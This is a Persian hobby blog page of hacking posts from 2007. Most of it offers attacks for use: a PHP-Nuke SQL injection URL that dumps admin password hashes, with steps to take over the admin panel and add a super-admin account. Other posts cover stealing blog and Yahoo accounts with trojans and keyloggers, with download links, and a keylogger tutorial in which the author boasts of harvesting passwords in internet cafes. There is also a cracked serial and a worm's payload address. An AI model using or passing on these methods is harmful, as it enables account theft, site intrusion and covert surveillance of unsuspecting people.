حتي زمانيكه علائم افشاگرانه از روي لايه كاربردي وب سرور حذف شد ، بر روي لايه هاي پايين تر شبكه نقاط ضعف آشكارسازي باقي مي ماند. هر سروري با يك اتصال شبكه داراي يك Network Protocol است كه قابل اسكن و شناسايي مي باشد ، بهترين اسكنرهاي پشته مانند NMAP مي تواند با استفاده از تكنيكهاي مختلف سيستم عامل را شناسايي كند. همچنين پشته IP مربوط به هر سيستم عامل نيز در مقابل شناسايي از طريق پروتوكل ICMP آسيپ پذير است. اولين راه مقابله با اين نوع آسيب پذيري ها استفاده از يك فايروال مي باشد. به اين نكته توجه داشته باشيد كه با وجود فايروال ، يك تحليل شبكه اي دقيق هنوز هم مي تواند نوع وب سرور را مشخص سازد.

Netcraft:
در سايت Netcraft با وارد نمودن URL هر وب سايت مي توان به اطلاعاتي در مورد سيستم عامل و وب سرور آن سايت بدست آورد. با تغيير دادن HTTP هدرها مي توان كاري كرد كه گزارش Netcraft اشتباه شود. همچنين با حذف HTTP هدرها ، Netcraftگزارش ناشناس بودن وب سرور را ارائه خواهد كرد.

پیش فرضهای :TCP/IP
احتمالاً هنوز سيستم عامل شما حتي از پشت يك ديوار آهنين نيز مورد شناسائي قرار خواهد گرفت. براي آنكه بتوان يك سيستم عامل را به طور كامل ناشناس كرد بايد برخي از پيش فرض هاي محيط IP/TCP مانند (Receive Window size) RWIN ، (Maximum Transmission Units) MTU ، MSS (Maximums Segment Size) ، (Time-to-Live) TTL دستكاري شود . در زمان تغيير دادن اين پيش فرض ها بسيار محتاط باشيد زيرا مي تواند تاثير معكوس بر روي وب سرور داشته و يا سيستم عامل را به طور كامل فلج سازد.
به خاطر داشته باشيد :
براي آنكه وب سرور شما كاملاً ناشناخته بماند بايد تمام مواردي كه در بالا ذكر شده است را بصورت تركيبي به كار بريد. هميشه به ياد داشته باشيد اين اقدامات پيشگيرانه تنها مي تواند باعث شكست اكثر نفوذ گران گردد نه همه آنها. يك نفوذگر ماهر و مصمم مي تواند از تمامي اين سدها عبور كند... هرگونه سوال و پیشنهادی داشتید با من تماس بگیرید.
+ نوشته شده در  جمعه هشتم تیر 1386ساعت 20:57  توسط پیمان  | 
مقاله ی آموزشی انواع اکسپلویت ها

با سلام خدمت تمامی بازدیدکنندگان محترم:

اکسپلویت های زیادی با نام های متفاوت ارایه می شوند که هر یک کاربرد خاصی دارند.به همین دلیل باید بدانیم که چه اکسپلویتی کجا به کار ما خواهد آمد.در مقاله ای در همین رابطه توضیحی در مورد انواع اکسپلویت ها داده شده است که می توانید از لینک زیر آن را دانلود کنید:

 

لینک دانلود مقاله آموزشی انواع اکسپلویت ها

+ نوشته شده در  جمعه هشتم تیر 1386ساعت 20:55  توسط پیمان  | 
آشنایی با حملات برنامه های وب

حملات توسط برنامه های وب بسیار خطرناک هستند و می توانند در نفوذ به سرور ها و سایت ها به ما کمک کنند.دانستن این که این حملات چگونه رخ می دهند و چگونه می توانیم از آن ها استفاده کنیم می تواند بسیار به ما کمک کند.در چند مقاله شما را با این حملات آشنا می کنیم.امیدوارم که از مقالات در جهت درست استفاده کنید.این مقالات را می توانید از لینک های زیر دریافت کنید:

 Introduction to Authentication Hacking attack by Siahacker

 Introdution to CRLF injection by Siahacker

  Introdution to Cross site Scripting by Siahacker

 Introdution to Directory Traversal Attacks by Siahacker

 Introdution to Google hacking by Siahacker

+ نوشته شده در  جمعه هشتم تیر 1386ساعت 20:53  توسط پیمان  | 
اموزش نحوه ی هک شدن وبلاگها و نحوه ی مقابله با ان بخش اول ( همراه با نرم افزار )
مقدمه:در این دوران اینترنت هر روزدر حال پیشرفت است و در این میان عده ای از افراد که نام خودشان را هکر گذاشته اند با اهدافی ترس را به جان صاحبان این وبلاگها و سایتها می افکنند که در این بین راهای زیادی برای حمله و دفاع وجود دارد که ما ابتدا نحوه حمله و سپس دفاع را با شما اموزش می دهیم.

بخش اول

به طور كلی ۲روش براي هك كردن وبلاگ وجود دارد:

هک کردن سرور وبلاگ(نفوذ به سرور وبلاگ)

هک کردن مستقیم وبلاگ(هک کردن صاحب وبلاگ)

نفوذ به سرور وبلاگ: براي نفوذ به سرور يك وبلاگ ۳ روش وجود دارد

۱- نفوذ مستقیم به سرور دهنده خدمات وبلاگ

 ۲- گوش دادن به سرور

۳- استفاده از اكسپولايتها

هک کردن صاحب وبلاگ

اين روش كه  ساده ترين روش هك وبلاگ است  ۹۹٪ وبلاگهای كه هك شده از اين روش هک میشوند

توضیح نحوه ی هک

همانطور که گفتم این روش ساده ترین نحوه کرده کردن وبلاگ می باشد که شما در این روش  بدون اشنایی با روشهای هکینک وبلاگ را هک می کنید.

روش ۱:در این روش شما باید ابتدا توسط تروجان و یا برنامه های پسورد سندر دیگر پسورد ایمیل خصوصی مدیر وبلاگ را بدست اورده و بعد در قسمت فراموشی رمز. یوزر و ایمیل خصوصی وبلاگ را بنويسيدتا در مدت چند ثانیه پسورد وبلاگ به ایمیل مدیر وبلاگ که شما پسورد انرا بدست اورده اید فرستاده شود و شما خیلی راحت وارد ان وبلاگ شده و پسورد و ایمیل خصوصی انرا عوض میکنید.

روش۲ :استفاده از کی لاگر ها:این روش هم که از بالایی هم ساده تر است فقط کافیه که فایل تروجان را به قربانی بدهید تا یوزر نیم و پسورد وبلاگ ان به ایمیل شما فرستاده شود

روش۳  :در این روش شما باید پشت سیستم قربانی بشینید و با استفاده از برنامه پسورد تمامی پسوردهایی که در ان سیستم همرا با یوزر انها ذخيره شده اندبرای شما نشان داده شود مثلا" در کافی نتها.

روش دفاع:بهترین روشهای دفاع  در مقابل هک شدن وبلاگ

دفاع در مقابل تروجانها:برای اینکه پسورد ایمیل خصصوصی شما توسط تروجانها هک نشود بهترین کار اینست که ایمیل خصوصی شما از yahoo نباشد چون پسورد سندرها انرا خیلی راحت هک می کنند و شما میتوانید از سایتهایی دیگری که خدمات ایمیل رایگان می دهند استفاده کنید و...

دفاع در مقابل کی لاگرها:وبلاگ شما برای اینکه توسط کی لاکرها هک نشود.بهترین کار اینست که در قسمت ورودی وبلاگ وقتی یوزر نیم و پسورد وبلاگ خود را وارد کرده اید و گزینه ورود را کلیک کرده اید در مقابل گزینه امنیتی که از شما میخواهد ایا میخواهید این رمز را به خاطر بسپارد و دفعات بعد انرا وارد نکنید شما NO را انتخاب كنيد و هر بار كه به وبلاگتون وارد ميشويد پسورد انرا وارد كنيد . با اين روش دیگر كي لاگرها قادر به شناسايي پسورد شما نمي باشند .

بعضی از دوستان فکر می کنند اگر از پسوردهاي طولاني و يا از پسوردهاي اعداد و يا حروف استفاده كنند وبلاگ و يا ايدي انها هك نمي شود #2#54856UGFD@RfDX# ولي اصلا" اين طور نيست اگر پسورد شما  توسط تروجان و يا چه توسط كي لاگر هك شود فرقي نمي كنند پسورد شما مانند بالا باشد و يا ساده به صورت مثلا"۶۶۶۶باشد پس خودتان را خسته نكنيد.

پیشنهاد

برای اینکه اگر احتمالا" در سیستم شما تروجان و یا کی لاگر نشست پسورد وبلاگ و یا یاهو مسنجر شما هک نشود اینست که از دکمه های ترکیبی استفاده کنید

پایین نگه داشتن دکمهshift بعلاوه زدن یکی از دکمه های   $#@!~ به دلخواه

مثال۲:پایین نگه داشتن دكمهALT بعلاوه  زدن دكمه هاي دلخواه از كيبرد

نرم افزار ضمیمه                                   

 کی لاگر  دانلود کن DBSpy5 در 10 ثانیه 

تروجان دانلود کن با حجم 650کیلو بایت (یاهو مسنجر ۸ و ۸.۱)

+ نوشته شده در  جمعه هشتم تیر 1386ساعت 20:51  توسط پیمان  | 
هك كردن پرتال هاي PHP-Nuke
رای هک کردن PHP-Nuke  یه سری کد هست که من یه نمونه از کد جدید رو اینجا گذاشتم کدهای جدید رو تو سایتهایی که باگ ها رو منتشر میکنند پیدا کنید ):

 

modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid%2c1%2cpwd%2c1%20FROM%20nu ke_authors%20/%2a

 

این کد ها رو باید در اخر اسم سایت کپی کنید ، باید حواستون هم باشه که PHP  تو کدوم شاخه نصب شده. مثلا :

 

http://www.Site.com/modules.php?nam..._authors%20/%2a

حالا اگه مثلا تو پوشه nuke  نصب شده بود اینجور میشد:

http://www.site.com/nuke/modules.ph..._authors%20/%2a

بعد از اینکارا اگه سایت پچ نشده باشه ( که خدا رو شکر همه اکثرن شدن ) به شما یه یوزر ادمین با یه پسورد هش ( MD5  ) میده . شما باید اون هش رو اینکد کنید.با Base64  که تو قسمت دانلود هست ، دانلود کنید.به این صورت اینکد کنید:

Admin:hash:

بعد که پسورد رو اینکد کردید میرید تو ادرس بار اینو مینویسید:

www.site.com/admin.php?admin=code

به جای admin  یوزر نیم و به جای Code  پسورد هش رو که اینکد کردید بذارید . میبینید که وارد منوی مدیریت میشید. حالا بعد از اینجا شما  2  راه دارید ، یکی اینکه شما با همین ادمین تغییراتی رو که میخواهید ایجاد کنید ، راه دوم هم اینه که واسه خودتون یه ادمین بسازید.

راه اول:

این راه اسون تر از راه دوم هست. وقتی وارد منو مدیر سایت شدید کافیه که بعد از کلیک کردن در هر لینک این رو بعد از لینک تو ادرس بار کپی کنید:

&admin=Code

به جای کد پسورد اینکد شده رو بذارید.

راه دوم :

این راه از اولی یکم سختره. شما باید یه مدیر بسازید ، این ادرس رو کپی کنید بعد از اسم سایت:

admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid
=$nick&add_email=hacker@hacker.com&add_pwd=$pass&admin=$hash";

به جای $nick  ها اسم یوزری که میخواهید بسازید رو بدید. به جای $pass  هم پسوردی که میخواهید بذارید واسه ادمینتون بذارید.به جای $hash  هم پسورد اینکد شده رو بذارید. بعد اینتر کنید اگه موفق شده باشید وارد صفحه لاگین کردن مدیر میشد ، یوزر و پسوردی رو که ساختید لاگین کنید.

+ نوشته شده در  جمعه هشتم تیر 1386ساعت 20:49  توسط پیمان  | 
پيدا كردن شماره تلفن طرف هنگامه چت كردن

برنامه Modem spy چندين كار مهم را انجام مي دهد  


1- پيدا كردن شماره تلفن كسي كه با وي چت مي كنيم

2- ظبط مكالماتي كه از تلفن صورت مي گيرد

3- نمايش دادن شماره تلفن شخصي كه به شما تماس مي گيرد(Caller ID)

هر كس اين برنامه را مي خواهد اينجا را كليك كند. 

اينم رجيستر نامبرش :

Name: modemspy
SN: 14458


خوب حالا روش كار با نرم افزار:

بعد از دريافت و اجراي نرم افزار يك شمايل كوچك در نوار وظيفه ويندوز

مشاهده مي نماييد. كه براي دسترسي به ترم افزار مي توانيد روي آن كليك

كنيد.

ابتدا تنظيمات مربوط به نرم افزار:
روي منوي فايل كليك كرده و گزينه Preferences را انتخاب نماييد. سپس

زبانه Harware را انتخاب نماييد و در آنجا مودم خود را براي نرم افزار مشخص

نماييد. همچنين تيك هر دو گزينه را بزنيد و در پايين اين دو گزينه كارت صوتي

خود را براي نرم افزار مشخص نماييد.حال به سراغ تب Recording برويد اگر

بخواهيد تمامي مكالماتي كه با شما تماس گرفته مي شود را ظبط كنيد بايد

تيك مربوط به گزينه Record all incoming calls را بزنيد در قسمت Answer

a call in seconds نيز در جاي خالي بايد مدت زماني را كه براي فعال شدن

برنامه وقتي كه كسي با شما تماس مي گيرد براي ظبط مكالمات مي باشد

را وارد نماييد كه بهتر است زمان 10 ثانيه باشد. اگر بخواهيد كه شما

مكالماتي كه با ديگران تماس مي گيريد را ظبط كنيد بايد تيك مربوط به گزينه

Record all outcalling … را علامت بزنيد.البته اگر اين تيك فعال باشد برنامه

هر 30ثانيه خط تلفن را براي شناساي اينكه كسي صحبت مي كند يا نه چك

مي نمايد. براي تغيير اين زمان مي توانيد در قسمت Check for dial tone

زمان مربوطه را وارد نماييد.

حال تب Save as را انتخاب نماييد.در قسمت Change format مي توانيد

فرمت مناسب براي ظبط مكالمات را انتخاب نماييد

در قسمت Advanced نيز هيچ گونه تغييري ندهيد در انتها گزينه Apply را

كليك كنيد.

حال دوباره به صفحه اصلي برنامه بر مي گرديم.در قسمت Input device

گزينه Modem و در قسمت Outpout device نيز Sound carad را انتخاب

نماييد و هر دو تيك كنار آنها را علامت بزنيد در پايين نرم افزار نيز تيك Record

all incoming calls را نيز علامت بزنيد. خوب تمام شد. اين نرم افزار به

شرطي كا مي كند كه مودم شما از قابليتهايي كه اين نرم افزار دارد و در بالا

معرفي شد پشتيباني كند اگر بعد از نصب نرم افزر با پيغام خطايي مواجه

شديد يعني مودم شما از اين قابليتها پشتيباني نمي كند

حالا فقط کافيه برنامه باز باشه .

اما چگونه هنگام چت شماره تلفن طرف رو پيدا کنيم:

برای اينکار شما بايد اول اين فايل پلاگين رو از اينجا دانلود کنيد.



در مرحله بعد اين فايل رو در پوشه plugin در مکانی که نرم افزار نصب شده

کپی کنيد. 

حالا ازمنو plugin در بالای نرم افزار گزينه networking را فعال کنيد ( معمولا

خودش فعاله اما کار از محکم کاری عيب نميکنی) توجه کنيد هيچکدام از

تنضيمات آن را تغيير ندهيد . حالا کافيست نرم افزار باز باشد خود نرم افزار به

صورت خودکار شماره طرف رو بهتون نشون ميده .


حالا فقط کافيه برنامه باز باشه . 

+ نوشته شده در  پنجشنبه هفتم تیر 1386ساعت 14:13  توسط پیمان  | 
برنامه ثبت کننده کلید
طريقه کارکرد و آموزش برنامه ثبت کننده کليد.برنامه اي براي هک کردن آيدي و پسورد ياهو در کافي نت ها
اين برنامه تمامي کليد ها و تمامي کار هايي را که کاربر انجام مي دهد در يک فايل ذخيره مي کند و شما با خواندن آن فايل مي توانيد به تمامي پسورد ها و يوزر نيم ها وتمامي سايت هايي که ديده و تمامي کار هايي را که انجام داده را بفهميد.

اين برنامه توسط هيچ نوع آنتي ويروسي حتي آنتي ويروس هاي قوي و به روز شده نيز قابل شناسايي نيست.

اين برنامه نياز به نصب ندارد و بعد از کليک بر روي آن تا هميشه کار مي کند.براي اطمينان بيشتر و براي اينکه کسي نفهمد که شا اين برنامه را اجرا کرده ايد، ابتدا برنامه را در يک جاي مخفي کامپيوتر يا يه جاي دنج کپي کنيد و بعد اون را اجرا کنيد.

اين برنامه تمامي نتايج بدست اومده خودش رو فقط و فقط بر روي يکي از درايو ها ذخيره مي کنه و هيچ فايل يا اطلاعات ديگر را به جايي نمي فرسته.{محل ذخيره کردن فايل اين برنامه C:\Temp\Sammoddhr.ary است.که mo ماه و dd روز و hr ساعت اجراي برنامه است.sam يه اسميه که خيلي تابلو نشه و .ary نيز مختصر اسم خودم است.}

اين برنامه قابليت تشخيص کليد هاي بزگ و کوچک و همچنين تشخيص کاراکتر هاي خاص مثل !@#$%^&*)(  و فاصله را نيز دارد.

براي حذف اين برنامه در ويندوز ايکس پي در منوي استارت به قسمت RUN برويد و در اين قسمت کلمه MSConfig را بنويسيد و به بعد از اينکه برنامه System Configuration Utility اجرا شد به قسمت Startup  برويد و تيک برنامه هاي SysRun را  برداريد.(اکثر برنامه هايي که در اين قسمت هستند احتمال دارد که ويروس باشند.)

بعد از اين که اين برنامه را اجرا کرديد برنامه به طور مخفي اجرا مي شود و با هر بار اجراي ويندوز نيز اجرا مي شود.

تشخيص کليد هاي فشرده شده :

اين برنامه کليدهاي معمولي را به صورت عادي مي نويسد.کليد هاي معمولي مثل ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_+~?><":}{|/.,';][\`

کليد هاي خاص را نيز به صورت {home} {Delete} يا به طور کلي  {اسم کليد} مي نويسد.

تشخيص سايت هاي بازديد شده :

اين برنامه تمامي سايت هايي را که کاربر  مشاهده کرده و تمامي برنامه هايي که اجرا کرده و تمامي کارهايي را که انجام داده مينويسد.طريقه نوشتن هم به اين صورت است که {Win==>page Title} که Page Title همان عنوان صفحه است.مثلاً {Win==>Windows Task Manager} نشان مي دهد که کاربر تسک منيجر ويندوز را اجرا کرده است.يا مثلا {Win==>Start Menu} نشنا مي دهد که کاربر بر روي دکمه استارت کليک کرده است.{Win==>Yahoo! Messenger - Invisible} نشان مي دهد که کاربر به صورت مخفي مي خواهد وارد ياهو شود است.{Win==>Sign In} نشان مي دهد که کاربر وارد صفحه ورود سايت يا برنامه اي شده و مي خواهد پسورد خود را پيدا کند.

طريقه بدست آوردن پسورد ياهو مسنجر با استفاده از اين برنامه:

بدست آوردن پسورد ياهو مسنجر تنها يکي از صد ها کاربرد اين برنامه است.براي بدست آوردن پسورد ياهو اول فايلي که توسط اين برنامه ساخته شده را با برنامه نوتپد باز مي کنيم.{براي باز کردن فايل به نشاني C:\Temp\Sammoddhr.ary برويد.که mo ماه و dd روز و hr ساعت اجراي برنامه است.sam يه اسميه که خيلي تابلو نشه و .ary نيز مختصر اسم خودم است.}{براي اجراي برنامه نوتپد به منوي استارت برويد و در آنجا گزينه Run را اجرا کنيد و در کادر روبرو کلمه Notepad را بنويسيد.}

بعد از باز کردن فايل برنامه دنبال کلمه {Win==>Sign In} بگرديد{براي جستجو در نوتپد به منوي Edit>Find برويد يا دکمه هاي CTRL+F را فشار بدهيد.}اين محلي است که کاربر يوزر نيم پسورد خود را مي نويسد.معمولاً کلمه اي که بعد از {Win==>Sign In} مي آيد يوزرنيم است.و کاربر بعد از اينکه اسم خود را مي نويسد دکمه {Tab} رافشار مي دهد و سپس پسورد خود را مي نويسد.بعد از اينکه يوزر نيم و پسورد نفر اول را پيدا کرديد.باز هم اين کار را انجام دهيد تا يوزر نيم ها و پسورد هاي ديگر را نيز بدست آوريد.

من خودم با همين برنامه يه روز 9 تا و روز بعد 12 تا يوزر نيم و پسورد پيدا کردم.البته روز بعد ديگه اين برنامه را حذف کردم.

همونطور که گفتم اين برنامه ميتونه حرف هايي که داخل چت هم گفته ميشه رو يادداشت کنه.براي اين کار به دنبال يوزرنيم مورد نظر مي گرديم و بعد از اون مي تونيم حرف هاش رو ببينيم.

دريافت نرم افزار

+ نوشته شده در  پنجشنبه هفتم تیر 1386ساعت 14:12  توسط پیمان  | 
هکرهای جهان نمی توانند "لینوکس فارسی" را هک کنند !
دبير"همايش نرم‌افزارهاي آزاد، متن باز و لينوكس فارسي": به دليل اين كه سيستم عامل مذكور مختص ايران مي‌باشد و سرور (دستگاه پردازشگر مركزي)آن در كشور نصب شده است، امكان نفوذ پذيري آن در سطح بين‌المللي به حد صفر مي‌رسد.


رييس دانشگاه علمي كاربردي پيام شهركرد گفت:" هكرهاي" رايانه‌اي جهان به هيچ عنوان توان نفوذ به سيستم نرم‌افزاري " لينوكس فارسي" را ندارند.

به گزارش آژانس خبری پرشین هک از ايرنا سيد جلال حسينيان در نشست با خبرنگاران استان چهار محال و بختياري در دانشگاه علمي كاربردي شهركرد افزود: سيستم لينوكس فارسي از ضريب‌امنيت و اطمينان بسيار بالايي برخوردار است و كدهاي آن به‌گونه‌اي طراحي شده است كه قابل نفوذ براي هكرها نباشد. به گفته وي، از ديگر ويژگي‌هاي اين سيستم بالا بودن سرعت و بومي بودن آن است كه موجب افزايش ضريب امنيت سيستم مي‌شود.


دبير"همايش نرم‌افزارهاي آزاد، متن باز و لينوكس فارسي" افزود: برنامه‌هاي اين سيستم بر اساس نيازهاي كاربران نوشته مي‌شود.

اين متخصص نرم‌افزار گفت: به دليل اين كه سيستم مذكور مختص ايران مي‌باشد و سرور (دستگاه پردازشگر مركزي)آن در كشور نصب شده است، امكان نفوذ پذيري آن در سطح بين‌المللي به حد صفر مي‌رسد.
به گفته وي، اين سيستم در راه‌اندازي"اينترنت ملي"نقش مهمي ايفا مي‌كند و در صورت قطع اينترنت، سيستم لينوكس فارسي پس از متصل شدن، به صورت خودكار فعال خواهد شد.

دبير "همايش نرم‌افزارهاي آزاد متن باز و لينوكس فارسي" گفت: با توجه به اينكه ايران عضو ناظر سازمان تجارت جهاني است، از اين پس بايد قانون "كپي رايت " را رعايت كند بخصوص اينكه نصب سيستم نرم‌افزاري "ويندوز" براي كشور هزينه بسيار بالايي را به همراه خواهد داشت.
حسينيان اظهار داشت: نصب سيستم "ويندوز" روي هر دستگاه رايانه‌اي دولتي و اداري يكصد دلار براي ايران هزينه دارد و موجب خروج ارز از كشور مي‌شود.

به گفته وي، سيستم نرم‌افزاري "لينوكس فارسي" قابليت نصب روي تمامي رايانه‌هاي خانگي را دارد.
دبير همايش"لينوكس فارسي" گفت: اين سيستم از سال ‪ ۸۲‬از سوي گروه فناوري اطلاعات دانشگاه صنعتي شريف در كشور طراحي شد و پيش بيني مي‌شود ، تا سال آينده اين سيستم در تمامي كشور فعال شود.

حسينيان تاكيد كرد: تمامي سيستم‌هاي نرم‌افزاري كشور تا پايان سال ‪ ۸۶‬به صورت كامل فارسي خواهند شد.
وي يادآور شد: نخستين همايش "لينوكس فارسي"‪ ۱۰‬خردادماه امسال در مجتمع فرهنگي هنري "غدير" شهركرد با همكاري شوراي عالي انفورماتيك و شوراي عالي اطلاع رساني برگزار خواهد شد.

در زمان حاضر اكثر دستگاه‌هاي دولتي در استان چهار محال و بختياري از برنامه‌هاي نرم‌افزاري"ويندوز ‪ "۹۸‬و " ويندوز‪ "xp‬روي سرورهاي خود استفاده مي‌كنند.

+ نوشته شده در  پنجشنبه هفتم تیر 1386ساعت 14:11  توسط پیمان  | 
برنامه جالب Anti worm

دانلود آنتی ورم

توضیحاتی درباره ویروس و نحوه انتشار

این ویروس در واقع نوعی کرم اینترنتی هست به نام W32.Imaut.A که از خطر کمی برخوردار می باشد ولی در عین حال برای دوستان مشکلاتی را به وجود می آورد که من بعضی از آن ها رو ذکر می کنم :

۱) قفل کردن Home Page روی صفحه ی آلوده

2) قفل کردن رجیستری

3) قفل کردن Task Manager

۴) ایجاد مشکل در لاگین شدن یاهو مسنجر

۵) ارسال لینک صفحه ی آلوده از طریق پیام توسط یاهو مسنجر و AOL به اد لیستتان برای انتشار خود با پیام های زیر :

  • have you ever seen such a silly man like this? [LINK]
  • making money online never be easier : [LINK]
  • damn, she is so cute [LINK]
  • to only way to clean some online viruses that may lead you into troubles : [LINK]
  • Now you can avoid some critical online viruses by updating Windows. Click here to know how to Update Windows : [LINK]
  • A new dangerous computer virus that can destroys all your data has just been released. Click here to know how to avoid it : [LINK]
  • Download free MP3s : [LINK]
  • Just check out my new personal website : [LINK]
  • You are virus infected . Use this tool to remove viruses from your PC : [LINK]
  • wtf is this? wanna give me a shit ? [LINK]
  • Let's vote for Vietnam's beauty - Mai Phuong Thuy - for the upcoming Miss World competition : [LINK]
  • check this link for me : [LINK]

    که این لینک به شکل زیر است :

    [http://]concerto4.net/?id=[RANDOM_TEXT]

    ۶) قفل کردن تایمری صفحه ی وبی که شما قبل از باز کردن صفحه ی آلوده به ویروس در آن قرار داشتید .  به این معنا که با مراجعه به آن صفحه و لود شدن کامل صفحه شما پس از چند ثانیه به صفحه ی ویروسی منتقل می شوید .

    ۷) ممکن است ورژن جدید خود را از آدرس [http://]64.141.110.32/ene[REMOVED] دانلود کند .

    نحوه ی انتشار :

    لینک این کرم از طریق یاهو مسنجر منتشر می شود . در واقع این کرم لینک خود را به اد لیست افراد ارسال می کند .

    با لود شدن صفحه ی آلوده کرم بدون هیچ گونه تاییدی از طرف کاربر به محض لود شدن صفحه توسط اجرای کد های VBscript وارد رایانه شخص می شود . و با ساخت کلید هایی در رجیستری تغییراتی در Home Page و یاهو مسنجر و Start Up ویندوز ایجاد می کند و همچنین  Task Manager و رجیستری ویندوز را از کار می اندازد .

    • + نوشته شده در  پنجشنبه هفتم تیر 1386ساعت 14:11  توسط پیمان  | 
    این وبلاگ فقط و فقط مطالبش مرتبط با موبایل می باشد . برای دانلود از این سایت لطفا از طریق Save Target As ... اقدام کنید و استفاده از نرم افزار های دانلود منیجر برای دانلود خودداری کنید .
    برای بهتر شدن این سایت ما را از نظرات خود دریق نسازید . اگر هم لینک دانلود هامشکلی دارند به ما اطلاع دهید تا تصحیحش کنیم.
    اگر دنبال برنامه ای می گردید که در وب نیست به ما اطلاع دهید تا براتون آماده کنیم .
    باتشکر از شما مدیر وبلاگ
    صفحه نخست
    پست الکترونیک
    آرشیو وبلاگ

    پیوندهای روزانه

    قالب OrenG N برای میهن بلاگی ها (ویرایش 2 )
    افزایش صدای اسپیکر هر نوع گوشی همراه با استفاده از ترفند
    هنگامی که گوشی خیس میشود!
    از BIOS چه می دانید؟ (قسمت اول)
    ترفند هکر ها ( قسمت اول )
    یک پک از عکس های بسیار زیبا و باکیفیت از نانسی عجرم
    دموی آهنگ نرگال که بسیار زیبا خونده
    کدهای مخفی سونی اریکسون
    یک سری برنامه های ویژه برای سونی اریکسون
    4 تا اسکرین سرور موبایل
    سری دوم از برنامه های ویژه برای موبایل با فرمت جاوا
    خبر مهم در رابطه با قالب Oreng N
    سری سوم کلیپ های تصویری ویژه ( 13 تا )
    یک روش ساده و آسان برای جلب بازدیدکننده
    تبادل لینک با ما
    پيدا كردن شماره تلفن طرف هنگامه چت كردن
    هك كردن پرتال هاي PHP-Nuke
    اموزش نحوه ی هک شدن وبلاگها و نحوه ی مقابله با ان بخش اول ( همراه با نرم افزار )
    آشنایی با حملات برنامه های وب
    روشهاي پنهان سازي وب سرور براي افزايش ايمنی
    هک کافی نت ها
    هک ISP با Ac-hacker
    روش هاي جديد براي باز کردن سايت فيلتر شده
    شهر دانلود
    آرشیو پیوندهای روزانه

    نوشته های پیشین

    شهریور 1386
    مرداد 1386
    تیر 1386
    دی 1378

    آرشیو موضوعی

    کلیپ های صوتی موبایل
    کلیپ های تصویری موبایل
    زنگ موبایل
    تم موبایل
    برنامه های موبایل
    عکس اس ام اس
    اس ام اس
    بازی موبایل
    کد های مخفی
    آموزش موبایل
    ترفند موبایل
    اسکرین سرور موبایل
    آموزش و ابزار های هک
    معرفی گوشی
    آنتی ویروس موبایل
    آموزش دانلود از این وبلاگ
    اخبار سایت
    تبادل لینک با ما
    وبلاگ نویسی
    قالب های طراحی شده

    نویسندگان

    پیمان
    محمدرضا

    پیوندها

    شهر دانلود
    تبلیغات پیکسلی رایگان
    پاسخ به تمام مسابقات اینترنتی
    بیا تو حال کن
    دختر یخی
    وبلاگ اختصاصی امپایر رپ
    طراح قالب اختصاصی بلاگفا
    جدیدترین موزیک ها عکسهای بازيگران برنامه های موبايل
    جک + اس ام اس + کارتون + عکس
    سرزمین بازیهای رایانه ای
    بهترين وبلاگ
    مرا با عینک آفتابیم به خاک بسپارید
    بزرگترین و شاخترین وبسایت رپ
    بهترین سایت دانلود
    مطالب و مقالات علمی و آموزشی رایگان
    ميهن دانلود
    خفاش موجود عجیب و دست نیافتنی
    دنیای نرم افزار
    سایت تخصصی موبایل
    بهتون خوش بگذره
    برترين كليپ هاي موبايل
    پایگاه اطلاع رسانی فناوری اطلاعات و ارتباطات
    کلیپ موبایل
    پر قدرت ترین سایت کسب در آمد و تجارت
    خفنترین آموزشهای وبلاگنویسی
    دانلود بازار
    برترين دانلود ها
    تم - موبايل - داستان - عكس - دانلود موزيك
    Y A N G C H A N G
    جديد ترين برنامه ها در دانلودستان
    پاتوق دختر پسر هاي ايروني
    سلطان وب
    همه چيز براي موبايل در کاکتوس109
    گالری عکس+برنامه موبایل
    كليپ‌هاي خفن موبايل
    دانلود*والپيپر*موبايل*سينما*فيل تر شکن*عکس
    كليپ موبايل
    دانلود جديدترين كليپ هاي صوتي و تصويري موبايل
     RSS 

    POWERED BY
    BLOGFA.COM